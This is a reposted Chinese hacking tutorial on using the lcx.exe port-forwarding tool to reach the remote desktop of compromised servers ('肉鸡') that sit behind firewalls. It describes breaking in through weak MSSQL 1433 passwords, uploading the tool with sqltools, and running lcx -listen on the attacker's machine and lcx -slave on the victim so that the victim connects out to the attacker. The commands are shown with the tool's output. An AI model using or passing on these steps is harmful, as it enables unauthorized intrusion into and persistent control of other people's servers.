转帖：利用LCX穿越防火墙

　　以前抓肉鸡都是通过1433弱口令，然后……
　　但是发现很多服务器开了1433、3389，但是终端连不上。因为服务器本身是在内网，只对外开放了1433端口，幸好有lcx.exe这个东西，用sqltools.exe传倒服务器上……

　　lcx.exe是个端口转发工具，相当于把肉鸡A上的3389端口转发到B机上，当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。

　　例如：在本地控制机B上监听 -listen 51 3389，在肉鸡A上运行-slave B的IP地址 51 A的IP地址 3389，那么在本地控制机B连127.0.0.1就可以连肉鸡A的3389。注：第二条是将本地控制机B的51端口的数据转向3389端口。

 

　　首先在本地控制机B的cmd下运行lcx.exe -listen 51 3389，意思是监听51端口并转发到3389端口。
　　显示如下：[+] Listening port 51 ......
　　[+] Listen OK!
　　[+] Listening port 3389 ......
　　[+] Listen OK!
　　[+] Waiting for Client on port:51 ......

 

　　然后在肉鸡A上运行 lcx.exe -slave [本地控制机B的IP] 51 [肉鸡A的IP] 3389
　　运行以后本地控制机B监听端口就会收到信息.[+] Listening port 51 ......
　　[+] Listen OK!
　　[+] Listening port 3389 ......
　　[+] Listen OK!
　　[+] Waiting for Client on port:51 ......
　　[+] Accept a Client on port 51 from [肉鸡A的IP] ......
　　[+] Waiting another Client on port:3389....

　　好了.现在在自己机子上链接 127.0.0.1 或者输入本地控制机B的IP.
　　发现进去的不是自己机子,（或者自己机子根本连不上），而是肉鸡A了！

 

　　优点：搞定内网肉鸡。
　　缺点：有点麻烦。

 

文章转自： http://blog.nnsky.com/blog_view_75846.html?page=1，有改动。